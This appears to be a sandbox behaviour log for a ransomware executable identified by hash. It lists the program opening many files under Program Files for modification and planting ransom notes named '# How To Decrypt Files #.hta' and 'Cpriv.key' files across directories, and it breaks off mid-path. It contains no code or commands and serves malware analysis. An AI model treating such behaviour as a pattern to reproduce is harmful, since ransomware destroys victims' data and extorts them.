de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\arrow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)grayStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099170.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05930_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15072_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-horizontal.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14538_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00915_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01858_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0213243.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0234657.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSOUC_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\add_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\play-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105294.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_Off.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Graph.emf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\PNCTUATE.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14882_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0293832.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.FR.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\AIR98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14985_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\Access\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\et\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\glow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241037.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\access-bridge-64.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105348.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198234.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01747_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02187_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\windows-amd64\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Library\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIDEBARBB.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\WidescreenPresentation.potx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\ink\1.7\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\LEVEL\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIconsMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Origin.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\PROOF\1036\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_disabled.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\default_apps\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_widescreen_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\oskmenubase.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceArray.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\add_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\7-Zip\Lang\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook.bat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00478_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\SETLANG.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonUp_Off.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\InfoPath.en-us\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\OUTGOING.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\lv.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00810_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\EXCEL.DEV_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\js\settings.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe AIR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\ea.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Microsoft.Office.BusinessData.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMaskSmall.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGACCBOX.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720x480icongraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN01164_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01241_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsPreviewTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\AppInfoDocument\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00814_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02361_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\EssentialMergeLetter.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\1047x576black.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01421_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200430124749.pma de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color32.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01761_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152600.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02048_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Source Engine\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Certificates\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsBlankPage.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsrom.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\bin\server\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\be\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_specialocc_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285792.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02522_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0286034.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OWSHLP10.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsdeu.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237336.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01575_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Style\TURABIAN.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\Templates\To_Do_List.jtp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_windy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\NETWORK\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\AccessWeb\RPT2HTM4.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GreenTea.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABOFF.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\REFINED\REFINED.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FINCL_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\title_stripe.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BS53BOXS.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RICEPAPR\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_SlateBlue.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\MSBuild\Microsoft\Windows 